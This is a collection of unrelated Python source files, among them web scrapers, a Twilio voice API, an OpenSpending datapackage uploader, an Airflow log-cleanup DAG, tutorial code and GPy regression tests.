browser.set_handle_equiv(False)\n browser.addheaders = [('User-Agent',\n 'Mozilla/5.0 (Macintosh; Intel Mac OS X 10_10_1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36'),\n ('Accept', 'text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8'),\n ('Accept-Language', 'en-US,en;q=0.8,ru;q=0.6'),\n ('Cache-Control', 'max-age=0'),\n ('Connection', 'keep-alive')]\n\n html = browser.open(site)\n soup = BeautifulSoup(html, 'html.parser')\n result = soup.find_all('span', attrs={'style': 'margin-left: 20px;'})[0].text\n result = result.split()\n result = int(result[-2] + result[-1])\n result = round(result / 25) + 1\n browser.close()\n return int(result)\n\n\nif __name__ == \"__main__\":\n pc = PathCreator()\n path = pc.create_polon_phd_file_path('polon_phd_%s.txt')\n\n scraper = POLonPhDScraper23072015()\n # scraper.scrap_and_save_to_files(path)\n scraper.scrap()\n","sub_path":"POL-on/polon/POLonPhDScraper23072015.py","file_name":"POLonPhDScraper23072015.py","file_ext":"py","file_size_in_byte":5093,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"79"} +{"seq_id":"147903706","text":"def scrape():\n from splinter import Browser\n from splinter.exceptions import ElementDoesNotExist\n import numpy as np\n from bs4 import BeautifulSoup\n import pandas as pd\n import requests\n executable_path = {'executable_path': 'Resources/chromedriver.exe'}\n browser = Browser('chrome', **executable_path, headless=False)\n\n # 1.1 Scraping News Title and Paragraphs\n url1 = 'https://mars.nasa.gov/news/?page=0&per_page=40&order=publish_date+desc%2Ccreated_at+desc&search=&category=19%2C165%2C184%2C204&blank_scope=Latest'\n browser.visit(url1)\n news_title = []\n news_para = []\n for pages in range(10):\n html = browser.html\n soup = BeautifulSoup(html, 'html.parser')\n titles = soup.find_all(class_ = 'content_title')\n paragraphs = soup.find_all(class_ = 'article_teaser_body')\n for title in titles: \n news_title.append(title.a.text)\n for paragraph in paragraphs:\n news_para.append(paragraph.text)\n try:\n browser.click_link_by_partial_text('MORE') \n except:\n print(\"Scraping Complete\")\n np_news_title = np.unique(np.array(news_title))\n np_news_para = np.unique(np.array(news_para))\n\n # 1.2 Get Images JPL Mars Space Images - Featured Image\n url2 = 'https://www.jpl.nasa.gov/spaceimages/?search=&category=Mars'\n browser.visit(url2)\n featured_image_url = []\n for pages in range(5):\n html = browser.html\n soup = BeautifulSoup(html, 'html.parser')\n url_imgs = soup.find_all(class_ = 'img')\n for url_img in url_imgs: \n image = url_img.img['src']\n featured_image_url.append('https://www.jpl.nasa.gov' + image)\n try:\n browser.click_link_by_partial_text('Next')\n except:\n print(\"Scraping Complete\")\n np_featured_image_url = np.unique(np.array(featured_image_url))\n\n # 1.3 Mars Weather\n url3 = 'https://twitter.com/marswxreport?lang=en'\n response = requests.get(url3)\n soup = BeautifulSoup(response.text, 'html.parser')\n mars_weather = []\n results = soup.find_all('div', class_=\"js-tweet-text-container\")\n for result in results:\n try:\n weather = result.p.text\n mars_weather.append(weather)\n except AttributeError as e:\n print(e)\n mars_weather = mars_weather[1]\n\n # 1.4 Mars Facts\n url4 = 'https://space-facts.com/mars/'\n marsFacts = pd.read_html(url4)[0]\n marsFacts.drop(columns = 'Earth', inplace = True)\n marsFacts.columns = ['MarsFacts', 'Value']\n marsFacts.head()\n\n # 1.5 Mars Hemispheres\n url5 = 'https://astrogeology.usgs.gov/search/results?q=hemisphere+enhanced&k1=target&v1=Mars'\n browser.visit(url5)\n image_url = []\n title = []\n href_container = []\n\n html = browser.html\n soup = BeautifulSoup(html, 'html.parser')\n href_url_divs = soup.find_all('div', class_ = 'item')\n for div in href_url_divs:\n href_container.append('https://astrogeology.usgs.gov' + div.a['href'])\n for links in href_container:\n try:\n browser.visit(links)\n html = browser.html\n soup = BeautifulSoup(html, 'html.parser')\n browser.click_link_by_partial_text('Open')\n img = soup.find('img', class_ = 'wide-image')\n title = soup.find('h2', class_ = 'title')\n print(img)\n image_url.append({'title': title.text.replace(' Enhanced',''),'img_url' : 'https://astrogeology.usgs.gov/' + img['src']})\n except:\n print('scraping complete')\n\n scrapped = {\n 'NewsTitle': np_news_title,\n 'NewsParagraps' : np_news_para,\n 'FeaturedImages' : np_featured_image_url,\n 'Facts': marsFacts,\n 'Weather': mars_weather,\n 'Hemispheres': image_url\n }\n return(scrapped)\n\nscrape_value = scrape()","sub_path":"scrape_mars.py","file_name":"scrape_mars.py","file_ext":"py","file_size_in_byte":3886,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"79"} +{"seq_id":"129143089","text":"# SIMPLE HERITAGE\n# syntax:\n\nclass A:\n \"\"\"This is the super-class\"\"\"\n pass\n\nclass B(A):\n \"\"\"This class inherit from A\"\"\"\n pass\n\n# Example on inherited methods:\n\nclass Person:\n \"\"\"This class defines persons with attributes :\n - name\n - surname\n \"\"\"\n\n def __init__(self, surname):\n \"\"\"Constructor for the class Person\"\"\"\n self.surname = surname\n self.name = \"James\"\n\n def __str__(self):\n return \"{} {}\".format(self.name, self.surname)\n\nclass SpecialAgent(Person):\n \"\"\"This class inherit from Person but it has its own constructor and methods\"\"\"\n\n def __init__(self, surname, code):\n \"\"\"Constructor for the class Person\"\"\"\n self.surname = surname\n self.code = code\n\n def __str__(self):\n return \"Agent {}, code {}\".format(self.surname, self.code)\n\nagent = SpecialAgent(\"Fisher\", \"006\")\nprint(agent) # it works but if we do:\n# print(agent.name) we receive an AttributeError: 'SpecialAgent' object has no attribute 'name'\n\n# The reason is because we created the object as 'object = SpecialAgent(...)' and therefore we used the constructor in the subclass.\n# Python found a constructor in SpecialAgent hence it does not look above in Person.\n# It is useful to remind that 'my_object.my_method()' is equivalent to 'My_class.my_method(my_object)' and modify the constructor\n# of SpecialAgent in order to call the constructor of Person (which contains a default name):\n\nclass SpecialAgent(Person):\n \"\"\"This class inherit from Person but it has its own constructor and methods\"\"\"\n\n def __init__(self, surname, code):\n \"\"\"Constructor for the class Person\"\"\"\n #self.surname = surname # instead of declaring surname we call\n # the method '__init__' of the class 'Person' on the object 'self' (agent) taking the 'attributes' 'self' and 'surname':\n Person.__init__(self, surname)\n self.code = code\n\n def __str__(self):\n return \"Agent {}, code {}\".format(self.surname, self.code)\n\nagent = SpecialAgent(\"Bond\", \"007\")\nprint(agent)\nprint(agent.name) # and now it works !!\n\n# To solve the infinite loop calls of __setattr__ in special_methods.py we could have done a similar thing by calling explicitly inside\n# the method __setattr__ of our class, the method __setattr__ of the super-class object :\n\n# class SomeClass: # which, as any class, inherit from object by default\n#\n# def __setattr__(self, attr, value):\n# \"\"\"Method called when we type: objet.attr = value\"\"\"\n# print(\"Attention, we change the attribut {} of the object !\".format(attr))\n# object.__setattr__(self, attr, value)\n\n# To conclude the part on simple heritage we cite a couple of useful function which explain theirselves with examples:\n\nprint(\"SpecialAgent subclass of Person ? \", issubclass(SpecialAgent, Person))\nprint(\"Person subclass of SpecialAgent ? \", issubclass(Person, SpecialAgent))\nprint(\"SpecialAgent subclass of object ? \", issubclass(SpecialAgent, object))\nprint(\"Person subclass of object ? \",issubclass(Person, object))\n\nprint(\"agent istance of SpecialAgent ? \", isinstance(agent, SpecialAgent))\nprint(\"agent istance of Person ? \", isinstance(agent, Person))\n\n\n# MULTIPLE HERITAGE\n# syntax:\n\n#class SubClass(MotherClass1, MotherClass2):\n# pass\n\n# order is important: Python will look for methods first in Subclass, then in MotherClass1 and finally in MotherClass2\n\n\n# COME BACK TO EXCEPTIONS\n# Exceptions are not only classes but they also have a hierarchy according to a precise heritage scheme. To know more about it look at heritage.py\n# for example, take a look at:\nhelp(AttributeError)\n\n# We can insert our exception in the hierarchy. It must contain a constructor and a __str__ method:\n\nclass MyException(Exception): # it inherit from the super-class 'Exception'\n \"\"\"Exception raised in un undefined context\"\"\"\n\n def __init__(self, message):\n \"\"\"We just store the message\"\"\"\n self.message = message\n\n def __str__(self):\n \"\"\"We just return the message\"\"\"\n return self.message\n\nraise MyException(\"OOOPS... I did it again\")\n","sub_path":"heritage.py","file_name":"heritage.py","file_ext":"py","file_size_in_byte":4110,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"8"} +{"seq_id":"193658489","text":"import os\nimport sys\n\nif os.name == 'nt':\n module_path = os.path.abspath(os.path.join('..\\..\\..'))\nelse:\n module_path = os.path.abspath(os.path.join('../../..'))\n\nif module_path not in sys.path:\n sys.path.append(module_path)\n\nfrom LNEX import LNExBase\n\n\ndef main(file_name):\n #find ditk_path from sys.path\n \n\n #instantiate the implemented class\n lnex_obj = LNExBase()\n\n # read data\n test_set,eval_set = lnex_obj.read_dataset(file_name)\n\n\n # initialiaze gazetteer\n dummy = \"\"\n geo_info = lnex_obj.train(dummy)\n\n\n # predict\n lnex_obj.predict(geo_info, test_set)\n\n # evaluation\n results = lnex_obj.evaluate(geo_info, eval_set)\n print(results)\n\n\nif __name__ == \"__main__\":\n #find ditk_path from sys.path\n ditk_path = \"\"\n for path in sys.path:\n if \"ditk\" in path:\n ditk_path = path\n #print(ditk_path)\n file_name = ditk_path+\"/entity_linkage/normalization/lnex/test/sample_input.txt\"\n main(file_name)","sub_path":"entity_linkage/normalization/lnex/main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":981,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"8"} +{"seq_id":"110261887","text":"from suppliments import matrix as m\n\n# inp=[]\n# out=[]\n# t=[]\n# weights=[]\n# size_inp=int(input('No. of data sets'))\n# size_t=int(input('No. of elements in each data set'))\n# for i in range(0,size_inp):\n# t=[]\n# print('set '+str(i)+': ')\n# for j in range(0,size_t):\n# t.append(float(input('x'+str(j)+': ')))\n# t.append(1)\n# inp.append(t)\n# out.append(int(input('expected output:')))\n\n\n# training_data={'inp':inp,'out':out}\n\n# weights=m.assign_w(size_t,size_t)\n\n\n\n# # print(m.activation(m.dot(training_data['inp'][1],weights)[1]))\n\n\nclass nn():\n def __init__(self,layers):\n self.l=len(layers)\n self.weights=[]\n self.learning_rate=.5\n for i in range(self.l-1):\n w=m.assign_w(layers[i+1],layers[i])\n self.weights.append(w)\n\n def hi(self):\n print(self.l)\n print(self.weights)\n # print(self.weights[2][0][1])\n \n def forward(self,input):\n x=input\n self.a=[]\n for i in range(self.l-1):\n x.append(1)\n self.a.append(x)\n x=(m.activation(m.dot(self.weights[i],x),'sigmoid'))\n\n self.y_=x\n print(x)\n\n\n def bp(self,i,j,k):\n # print('i' +str(i)+' j '+str(j)+' k '+str(k)+':::: ' +str(self.a[i][k]))\n # print(self.weights[i][j][k])\n calc=self.weights[i][j][k]*self.a[i][k]*(1-self.a[i][k])\n print(' 1 calc '+str(self.weights[i][j][k])+'*'+str(self.a[i][k]*(1-self.a[i][k])))\n\n calc2=0\n if i>self.l-3:\n # print('i'+str(i))\n return calc\n for p in range(len(self.weights[i+1])):\n calc2=calc2+self.bp(i+1,p,j)\n print(' calc '+str(self.weights[i][j][k])+'*'+str(self.a[i][k]*(1-self.a[i][k]))+' calc2 '+str(calc2))\n return calc*calc2\n def backward(self,y):\n i=2\n j=0\n k=0\n correction=self.bp(i,j,k)\n # print(' ddddddd '+str(correction))\n correction=correction/(self.weights[i][j][k]*(1.0-self.a[i][k]))\n print(' ddddddd '+str(correction))\n correction=correction*self.learning_rate*2*(y-self.y_[0])\n self.weights[i][j][k]=self.weights[i][j][k]+correction\n\n\n def train(self,x,y):\n for i in range(100):\n for i in range(len(x)):\n self.forward(x[i])\n self.backward(y)\n\nx=[[1,1],[0,0],[1,0],[0,1]]\ny=[0,0,1,1]\n\nk=nn([2,2,2,1])\n# k.hi()\nfor i in range(20):\n print('######################################################################')\n # print(k.weights)\n k.forward([3,6])\n k.backward(1)\n\n\n\n# w=m.assign_w(3,2)\n# print(w)","sub_path":"sample data/backup.py","file_name":"backup.py","file_ext":"py","file_size_in_byte":2673,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"8"} +{"seq_id":"25697613","text":"import serial\nfrom PySide2.QtCore import Signal, QRunnable, QObject\n\n\nclass Signals(QObject):\n over = Signal(object)\n started = Signal(object)\n con_fail = Signal(object)\n imp_fail = Signal(object)\n\n\nclass Worker(QRunnable):\n def __init__(self, fn, *args, **kwargs):\n super().__init__()\n self.fn = fn\n self.args = args\n self.kwargs = kwargs\n self.signals = Signals()\n\n def run(self):\n try:\n result = self.fn(*self.args, **self.kwargs)\n except serial.SerialException as ser_ex:\n print(ser_ex)\n self.signals.con_fail.emit(ser_ex)\n except NotImplementedError as imp_ex:\n print(imp_ex)\n self.signals.con_fail.emit(imp_ex)\n else:\n self.signals.over.emit(result)\n","sub_path":"Engine/ThreadDecorators.py","file_name":"ThreadDecorators.py","file_ext":"py","file_size_in_byte":803,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"8"} +{"seq_id":"328615221","text":"from flask import Blueprint\nfrom flask import request\nfrom flask import jsonify\n\nfrom credentials import credentials\nfrom twilio.rest import Client\n\nvoice = Blueprint(\"voice\", __name__)\n\n@voice.route(\"/outbound\", methods=['POST'])\ndef outbound():\n try:\n data = request.json\n\n account_sid = credentials['account_sid']\n auth_token = credentials['auth_token']\n client = Client(account_sid, auth_token)\n \n call = client.calls.create(\n url=data['twiml_url'],\n to=data['to'],\n from_=['from']\n )\n \n return 'sucess'\n\n except Exception as e:\n return (str(e))\n\n@voice.route(\"/record\", methods=['post'])\ndef record():\n try:\n data = request.json\n\n account_sid = credentials['account_sid']\n auth_token = credentials['auth_token']\n client = Client(account_sid, auth_token)\n\n call = client.calls.create(\n record=True,\n url=data['twiml_url'],\n to=data['to'],\n from_=['from']\n )\n\n return 'sucess'\n \n except Exception as e:\n return (str(e))\n\n@voice.route(\"/retrieve-recording\", methods=['get'])\ndef retrieve():\n try:\n account_sid = credentials['account_sid']\n auth_token = credentials['auth_token']\n client = Client(account_sid, auth_token)\n\n response = {}\n\n recordings = client.recordings.list(limit=20)\n\n for index, record in enumerate(recordings):\n temp = { 'recording_sid': record.sid, 'account_sid': record.account_sid, 'call_sid': record.call_sid, 'duration': record.duration }\n response[index] = temp\n\n return response\n \n except Exception as e:\n return (str(e))","sub_path":"voice/voice.py","file_name":"voice.py","file_ext":"py","file_size_in_byte":1755,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"8"} +{"seq_id":"622081809","text":"\"\"\" This modules uploads data-packages to the Open-Spending datastore\"\"\"\n\nfrom __future__ import absolute_import\nfrom __future__ import division\nfrom __future__ import print_function\nfrom __future__ import unicode_literals\n\nimport sys\nimport io\n\nfrom base64 import b64encode\nfrom hashlib import md5\nfrom os.path import getsize, join, basename, isfile\nfrom time import sleep\nfrom datapackage import DataPackage\nfrom datapackage.exceptions import ValidationError\nfrom future import standard_library\nfrom gobble.user import User\nfrom requests import HTTPError\nfrom requests_futures.sessions import FuturesSession\n\nfrom gobble.config import settings\nfrom gobble.logger import log\nfrom gobble.api import (handle, upload_package, request_upload,\n toggle_publish, upload_status)\n\nstandard_library.install_aliases()\n\n\nHASHING_BLOCK_SIZE = 65536\nOS_DATA_FORMATS = ['.csv']\nPOLL_PERIOD = 5\n\n\nclass ToggleError(Exception):\n pass\n\n\ndef compute_hash(filepath):\n \"\"\"Return the md5 hash of a file\"\"\"\n hasher = md5()\n\n with io.open(filepath, 'rb') as stream:\n chunk = stream.read(HASHING_BLOCK_SIZE)\n while len(chunk) > 0:\n hasher.update(chunk)\n chunk = stream.read(HASHING_BLOCK_SIZE)\n\n md5_binary = hasher.digest()\n md5_bytes = b64encode(md5_binary)\n md5_unicode = md5_bytes.decode('utf-8')\n\n return md5_unicode\n\n\nclass FiscalDataPackage(DataPackage):\n \"\"\"This class represents a fiscal data package.\n\n The class is a subclass of the :class:`datapackage.DataPackage` class.\n The constructor takes the same arguments as its parent class, except that\n the schema is \"fiscal\".\n\n :param target: The target is the full path to the fiscal datapackage JSON\n descriptor, but it can also be a dictionary representing the schema itself\n or a url pointing to a descriptor (for more information please refer to the\n documentation for the :class:`datapackage.DataPackage` class.\n :param user: a `gobble.user.user` object.\n \"\"\"\n\n def __init__(self, filepath, user=None, **kw):\n if not isfile(filepath):\n raise NotImplemented('%s is not a local path', filepath)\n\n super(FiscalDataPackage, self).__init__(filepath,\n schema='fiscal', **kw)\n self._check_file_formats()\n\n self._streams = []\n self._session = FuturesSession()\n self._futures = []\n self._responses = []\n\n self.user = user\n self.name = self.descriptor.get('name')\n self.path = basename(filepath)\n self.filepath = filepath\n\n def validate(self, raise_error=True):\n \"\"\"Validate a datapackage schema.\n\n :param raise_error: raise error on failure or not (default: True)\n :raise: :class:`ValidationError` if the schema is invalid\n :return True or a list of error messages (if `raise_error` is False).\n \"\"\"\n if raise_error:\n super(FiscalDataPackage, self).validate()\n\n else:\n try:\n super(FiscalDataPackage, self).validate()\n message = '%s (%s) is a valid fiscal datapackage descriptor'\n log.info(message, self, self.path)\n return []\n\n except ValidationError:\n messages = []\n\n for error in self.iter_errors():\n messages.append(error.message)\n log.warn('%s ValidationError: %s', self, error.message)\n\n return messages\n\n def upload(self, publish=False):\n \"\"\"Upload a fiscal datapackage to Open-Spending.\n\n It does this in 3 steps:\n * request upload urls for AWS S3 storage\n * upload all files to the owner's S3 bucket\n * insert the data into the Open-Spending datastore (PostgreSQL)\n\n By default, newly uploaded packages are kept private, but you can\n change that with the `publish` flag. Also note that if you upload the\n same fiscal data package again, the previous version will be\n overwritten.\n\n For now, the only valid datafile format is CSV.\n\n :param publish: toggle the datapackage to \"published\" after upload\n \"\"\"\n self.validate()\n log.info('Starting uploading process for %s', self)\n\n for s3_target in self._request_s3_upload():\n self._push_to_s3(*s3_target)\n\n self._handle_promises()\n self._insert_into_datastore()\n\n while self.in_progress:\n sleep(POLL_PERIOD)\n\n if publish:\n self.toggle('public')\n\n return self.url\n\n @property\n def url(self):\n return join(settings.OS_URL, self.user.id + ':' + self.name)\n\n @property\n def in_progress(self):\n \"\"\"Return true when the upload finished.\"\"\"\n\n query = dict(datapackage=self._descriptor_s3_url)\n answer = upload_status(params=query).json()\n args = self, answer['status'], answer['progress'], len(self)\n log.debug('%s is loading (%s) %s/%s', *args)\n return answer['status'] != 'done'\n\n def toggle(self, to_state):\n \"\"\"Toggle public access to a fiscal datapackage\n\n Change the status of a fiscal data package from public to private or\n vice-versa. If something went wrong, whilst changing the status, you\n will get a :class:`upload.ToggleError`.\n\n :param to_state: the unique name of the datapackage\n :return: the new state of the package, i.e. \"public\" or \"private\"\n \"\"\"\n publish = True if to_state == 'public' else False\n package_id = self.user.id + ':' + self.name\n query = dict(jwt=self.user.token, id=package_id, publish=publish)\n\n answer = handle(toggle_publish(params=query))\n\n if not answer['success']:\n message = 'Unable to toggle datapackage to %s'\n raise ToggleError(message, to_state)\n\n log.info('%s is now %s', package_id, to_state)\n return to_state\n\n def _check_file_formats(self):\n for resource in self:\n if resource.descriptor['mediatype'] != 'text/csv':\n message = 'Usupported format: %s, valid formats are %s'\n raise NotImplemented(message, resource.path, OS_DATA_FORMATS)\n\n @property\n def filedata(self):\n filedata = {\n resource.descriptor['path']: {\n 'name': resource.descriptor['name'],\n 'length': getsize(resource.local_data_path),\n 'md5': compute_hash(resource.local_data_path),\n 'type': resource.descriptor['mediatype'],\n } for resource in self\n }\n descriptor_file = {\n basename(self.filepath): {\n 'name': self.name,\n 'length': getsize(self.filepath),\n 'md5': compute_hash(self.filepath),\n 'type': 'application/octet-stream',\n }\n }\n filedata.update(descriptor_file)\n return {\n 'filedata': filedata,\n 'metadata': {\n 'owner': self.user.id,\n 'name': self.name\n }\n }\n\n def _get_header(self, path, content_type):\n filepath = join(self.base_path, path)\n return {'Content-Length': str(getsize(filepath)),\n 'Content-MD5': compute_hash(filepath),\n 'Content-Type': content_type}\n\n @property\n def _descriptor_s3_url(self):\n return join(settings.S3_BUCKET_URL, self.user.id, self.name, self.path)\n\n def _request_s3_upload(self):\n \"\"\"Request AWS S3 upload urls for all files.\n \"\"\"\n response = request_upload(params=dict(jwt=self.user.token), json=self.filedata)\n files = handle(response)['filedata']\n\n for path, info in files.items():\n message = '%s is ready for upload to %s'\n log.info(message, path, info['upload_url'])\n query = {k: v[0] for k, v in info['upload_query'].items()}\n yield info['upload_url'], path, query, self._get_header(path, info['type'])\n\n def _push_to_s3(self, url, path, query, headers):\n \"\"\"Send data files for upload to the S3 bucket.\n \"\"\"\n\n log.debug('Started uploading %s to %s', path, url)\n log.debug('Headers: %s', headers)\n log.debug('Query parameters: %s', query)\n\n absolute_path = join(self.base_path, path)\n stream = io.open(absolute_path, mode='rb')\n future = self._session.put(url,\n headers=headers,\n data=stream,\n params=query,\n background_callback=self._s3_callback)\n\n self._streams.append(stream)\n self._futures.append(future)\n\n @staticmethod\n def _s3_callback(_, response):\n handle(response)\n log.info('Successful S3 upload: %s', response.url)\n\n def _handle_promises(self):\n \"\"\"Collect all promises from S3 uploads.\n \"\"\"\n for stream, future in zip(self._streams, self._futures):\n exception = future.exception()\n if exception:\n raise exception\n response = future.result()\n\n if response.status_code != 200:\n message = 'Something went wrong uploading %s to S3: %s'\n log.error(message, response.url, response.text)\n raise HTTPError(message)\n\n self._responses.append(response)\n stream.close()\n\n def _insert_into_datastore(self):\n \"\"\"Transfer datafiles from S3 into the postgres datastore.\n\n :return: the url of the fiscal datapackage on Open-Spending\n \"\"\"\n query = dict(jwt=self.user.token, datapackage=self._descriptor_s3_url)\n response = upload_package(params=query)\n handle(response)\n\n log.info('Congratuations, %s was uploaded successfully!', self)\n log.info('You can find you fiscal datapackage here: %s', self.url)\n\n return self.url\n\n def __len__(self):\n return len(self.resources)\n\n def __repr__(self):\n return '' % (len(self), self.name)\n\n def __str__(self):\n return self.name\n\n def __iter__(self):\n for resource in self.resources:\n yield resource\n\n def __getitem__(self, index):\n return self.resources[index]\n\n\nif __name__ == '__main__':\n user_ = User()\n filepath_ = sys.argv[1]\n package_ = FiscalDataPackage(filepath_, user=user_)\n package_.upload(publish=True)\n","sub_path":"gobble/fiscal.py","file_name":"fiscal.py","file_ext":"py","file_size_in_byte":10567,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"8"} +{"seq_id":"599060002","text":"from openerp import models,fields\n\n\nclass InvoiceLine(models.Model):\n _inherit = 'account.invoice.line'\n\n date = fields.Datetime(string='Date')\n\n def create(self, cr, uid, values, context=None):\n values['date'] = fields.Datetime.now()\n return super(InvoiceLine, self).create(cr, uid, values, context=context)\n\n\n","sub_path":"prooaddons/medisys/invoice/invoice.py","file_name":"invoice.py","file_ext":"py","file_size_in_byte":334,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"8"} +{"seq_id":"436003035","text":"#Wiaux Bastien\n\ndef rho(a,b,c):\n return b**2-4*a*c\n\ndef n_solutions(a,b,c):\n r = rho(a, b, c)\n if r > 0:\n return 2\n elif r < 0:\n return 0\n elif r == 0: \n return 1\n \ndef solution(a,b,c):\n if n_solutions(a,b,c) == 1:\n return -b/(2*a)\n if n_solutions(a,b,c) == 2:\n x1 = (-b-racine_carree(rho(a,b,c)))/(2*a)\n x2 = (-b+racine_carree(rho(a,b,c)))/(2*a)\n if x1 > x2:\n return x2\n else:\n return x1\n","sub_path":"Exercices/3/Q Equations du second degré.py","file_name":"Q Equations du second degré.py","file_ext":"py","file_size_in_byte":495,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"8"} +{"seq_id":"557949859","text":"# -*- coding: utf-8 -*-\n\"\"\"\n# DAG to remove dag_processor_log files older than 10 days.\n\"\"\"\nfrom airflow import DAG\nfrom datetime import datetime, timedelta\nfrom airflow.operators.python_operator import PythonOperator\nfrom dags.exec_in_pod import exec_in_pod\n\nimport os\n\nSTART_DATE = datetime.now() - timedelta(weeks=2)\n\nnamespace = os.getenv('NAMESPACE')\ndeployment_name = 'airflow'\nselector = 'component=web'\nin_cluster = os.getenv('LOCAL_AIRFLOW', False) == 'False'\n\ndefault_args = {\n 'owner': 'airflow',\n 'depends_on_past': False,\n 'start_date': START_DATE,\n 'email_on_failure': False,\n 'email_on_retry': False,\n 'retries': 1,\n 'retry_delay': timedelta(minutes=5),\n}\n\nexec_command = [\n '/bin/sh',\n '-c',\n 'find /usr/local/airflow/logs/dag_processor_manager -name \"dag_processor_manager.log.*\" -type f -mtime +10 -exec rm -f {} \\;'\n]\n\nDAG_ID = os.path.basename(__file__).replace(\".pyc\", \"\").replace(\".py\", \"\")\n\nremove_logs_dag = DAG(DAG_ID, default_args=default_args, schedule_interval='@weekly')\n\ndef remove_logs(dag):\n return PythonOperator(\n python_callable=exec_in_pod,\n task_id='remove_processor_logs',\n op_args=[deployment_name, namespace, exec_command, selector],\n dag=dag\n )\n\nremove_logs(remove_logs_dag)\n","sub_path":"dags/remove_old_processor_logs.py","file_name":"remove_old_processor_logs.py","file_ext":"py","file_size_in_byte":1268,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"8"} +{"seq_id":"391279738","text":"\nimport pytest\nimport numpy as np\nimport warnings\nfrom numpy.testing import assert_array_almost_equal\n\nimport GPy\nfrom gp_grief.kern import RBF\nfrom gp_grief.models import GPRegressionModel\n\n\ndef rastrigin(x, lin_term=None):\n \"\"\"\n Rastrigin test function\n input should be in range [-5.12, 5.12]\n if x in range [0,1], can transform by rastrigin((x*2-1)*5.12)\n if lin_term is not None then will add a linear term to the first dimension. \n This helps to make the function non-symetric wrt the input dimensions\n \"\"\"\n assert x.ndim == 2\n d = x.shape[1]\n f = 10*d\n for i in range(d):\n f = f+(np.power(x[:,i,None],2) - 10*np.cos(2*np.pi*x[:,i,None]));\n if lin_term is not None:\n f += lin_term*x[:,(0,)]\n return f\n\n\nclass TestRegression:\n\n def test_gp_grief_model_all_active (self):\n for d in [1, 10]:\n # generate data\n np.random.seed(0)\n N = 100\n x = np.random.uniform(size=(N,d)) # generate dataset\n y = rastrigin((x*2-1)*5.12, lin_term=1.)\n xx = np.random.uniform(size=(N+1,d)) # generate test set\n\n # initialize GPy.models.GPRegression\n kern = GPy.kern.RBF(d)\n #with pytest.warns(UserWarning):\n mg = GPy.models.GPRegression(x, y, kern)\n #print('hej2')\n #warnings.warn(\"my warning\", UserWarning)\n # initialize gp_grief model\n kern = RBF(d)\n m = GPRegressionModel(x, y, kern)\n \n m.checkgrad() \n \n ll1, ll2 = mg.log_likelihood(), m.log_likelihood()\n assert_array_almost_equal(ll1, ll2, decimal=3) \n \n m.fit()\n alpha_gpy = mg.posterior.woodbury_vector\n assert_array_almost_equal(alpha_gpy, m._alpha, decimal=3)\n \n yyh = m.predict(xx, compute_var='full')\n yyh_gpy = mg.predict(xx,full_cov=True)\n assert_array_almost_equal(yyh_gpy[0], yyh[0], decimal=3)\n assert_array_almost_equal(yyh_gpy[1], yyh[1], decimal=2)\n \n m.optimize()\n\n def test_gp_grief_model_some_active (self):\n d = 10\n adims = [0,2,4,6,7]\n\n # generate data\n np.random.seed(0)\n N = 100\n x = np.random.uniform(size=(N,d)) # generate dataset\n y = rastrigin((x*2-1)*5.12, lin_term=1.)\n xx = np.random.uniform(size=(N+1,d)) # generate test set\n\n # initialize GPy.models.GPRegression\n kern = GPy.kern.RBF(len(adims), active_dims=adims)\n with pytest.warns(UserWarning):\n mg = GPy.models.GPRegression(x, y, kern)\n # initialize gp_grief model\n kern = RBF(d, active_dims=adims)\n m = GPRegressionModel(x, y, kern)\n \n m.checkgrad() \n \n ll1, ll2 = mg.log_likelihood(), m.log_likelihood()\n assert_array_almost_equal(ll1, ll2, decimal=3) \n \n m.fit()\n alpha_gpy = mg.posterior.woodbury_vector\n assert_array_almost_equal(alpha_gpy, m._alpha, decimal=3)\n \n yyh = m.predict(xx, compute_var='full')\n yyh_gpy = mg.predict(xx,full_cov=True)\n assert_array_almost_equal(yyh_gpy[0], yyh[0], decimal=3)\n assert_array_almost_equal(yyh_gpy[1], yyh[1], decimal=2)\n \n m.optimize()\n\n def test_combining_kernels (self):\n # generate data\n np.random.seed(1)\n N = 100\n d = 5\n x = np.random.uniform(size=(N,d)) # generate dataset\n y = rastrigin((x*2-1)*5.12, lin_term=1.)\n xx = np.random.uniform(size=(N+1,d)) # generate test set\n \n def dd (i): \n l = 0.5*i+0.5\n return {'lengthscale':l, 'variance':l, 'name':'k%d'%i} \n # first define the base kernels\n kb_gpy = [GPy.kern.RBF(d, **dd(i)) for i in range(4)]\n kb_kml = [RBF( d, **dd(i)) for i in range(4)]\n\n # then combine the base kernels\n k_gpy = ((kb_gpy[0] * kb_gpy[1]) + kb_gpy[2]) * kb_gpy[3]\n k_kml = ((kb_kml[0] * kb_kml[1]) + kb_kml[2]) * kb_kml[3]\n assert_array_almost_equal( k_kml.cov(x), k_gpy.K(x) )\n\n # construct the models\n m = dict()\n m['gpy'] = GPy.models.GPRegression(x, y, k_gpy)\n m['kml'] = GPRegressionModel(x, y, k_kml)\n m['gpy'].mul.sum.mul.k1.variance.fix()\n m['gpy'].mul.k3.variance.fix()\n\n assert m['kml'].checkgrad()\n\n ll1, ll2 = m['gpy'].log_likelihood(), m['kml'].log_likelihood()\n assert_array_almost_equal(ll1, ll2, decimal=3) \n\n yyh = dict()\n yyh['gpy'] = m['gpy'].predict(xx, full_cov=True)\n yyh['kml'] = m['kml'].predict(xx, compute_var='full')\n assert_array_almost_equal(*[yyh[key][0] for key in m], decimal=2) \n assert_array_almost_equal(*[yyh[key][1] for key in m], decimal=2) \n\n wv1, wv2 = m['gpy'].posterior.woodbury_vector, m['kml']._alpha\n assert_array_almost_equal(wv1, wv2, decimal=3)\n\n with pytest.warns(RuntimeWarning):\n m['gpy'].optimize()\n 